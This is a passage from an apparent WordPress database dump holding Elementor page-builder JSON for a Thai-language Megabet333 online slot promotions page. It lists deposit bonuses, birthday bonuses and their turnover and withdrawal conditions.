\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1247,152,'_thumbnail_id','61'),(1253,153,'_elementor_edit_mode','builder'),(1254,153,'_elementor_template_type','wp-page'),(1255,153,'_elementor_version','3.32.5'),(1256,153,'_elementor_pro_version','3.32.3'),(1257,153,'_wp_page_template','default'),(1258,153,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1259,153,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 